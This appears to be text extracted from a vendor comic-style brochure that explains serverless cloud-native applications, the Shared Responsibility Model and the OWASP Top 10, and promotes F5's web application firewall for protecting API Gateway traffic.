PRESENTED BY:
Datacenter
Web App Database Web App
There was an executive decision
to move some apps to the cloud.
We need to change how we
develop new applications!
But if we are starting an
application from scratch and
using the public cloud, it makes
sense to do it in the new way.
I’m responsible for the application’s security.
But what are cloud-native applications?
You have a car, right?
Acquisition $$$$
Maintenance
Per-Mile Cost
$$ + Overhead
$ $$
Fixed Cost No
Matter the Usage
Passengers Unlimited4
To own a server is like owning a car.
So people start using services based
in the cloud instead of servers.
This architecture is called Serverless.
WEBSERVERS
APPSERVERS
DBSERVERS
COST
USAGE
Traditional
Serverless
Cost Savings
Administrative
Overhead
Users
Serverless
Traditional
Now I get it! The application is cloud native, using
services, and not based in legacy architecture!
Correct!
API Gateway Other Services
No, we are still responsible for
the cloud security. Remember
the Shared Responsibility Model?
Your work will be easy, right? If we
are using cloud services, they will
be responsible for the security.
OWASP Top 10 Application Security Risks - 2017
A1: Injection
A2: Broken Authentication
A3: Sensitive Data Exposure
A4: XML External Entities (XXE)
A5: Broken Access Control
A6: Security Misconfiguration
A7: Cross-Site Scripting (XSS)
A8: Insecure Deserialization
A9: Using Components with Known Vulnerabilities
A10: Insufficient Logging & Monitoring
Let me show you an example.
API Gateway
Known AttacksXSS, CSRF, Injection, etc...
API Gateway Other Services
IP Intelligence
Services
Updates
every 5 min.
Geolocation database
= Botnet
Anonymous
requests
Anonymous
proxies
Scanner
Restricted
region or
country
Attacker
API Gateway
API Gateway
Known AttacksXSS, CSRF, Injection, etc...
Signatures
Update
API Gateway
Legitimate TrafficCheck Parameters, URIs,
Methods, Size, Pattern, etc...
Unknown
Behavior
API Gateway
Credit Card Number
4321-1234-4321-1234
API Gateway
Credit Card Number
4321-1234-4321-1234
Credit Card Number
XXXXXXXXXXXXXXXXXXXX
API Gateway
It was a challenge, but we finally have
our cloud-native application deployed!And also protected!
BIG-IP VE Advanced Web Application Firewall
•
•
•
PROBLEMWhen moving applications to public cloud,
security is still the #1 concern. Who is
responsible when data is leaked or the
application compromised?
That is why cloud providers use a Shared
Responsibility Model. That means that the
customer is responsible for security IN the
cloud, while the provider is responsible for
the security OF the Cloud.
In other words, companies are still
responsible for the security of their
applications, including cloud-native ones that
leverage serverless architecture.
These applications are still vulnerable to
XSS, data exfiltration, DDoS attacks, etc.
ALTERNATIVES
Code reviews and a rigid security posture
when developing cloud applications.
Cloud-native applications rely on API calls to an API Gateway provided by the cloud provider. F5
Application Security Manager protects all calls made to the API Gateway, validating all requests
before sending them to be processed by the application itself.
F5 has been protecting applications and APIs for a long time and is recognized as a leader in this
market. As a full-proxy solution, caching requests that would consume cloud resources, F5 can
also improve performance and reduce usage bills.
SOLUTION
API Protection
Application
Attacker
Users
API Gateway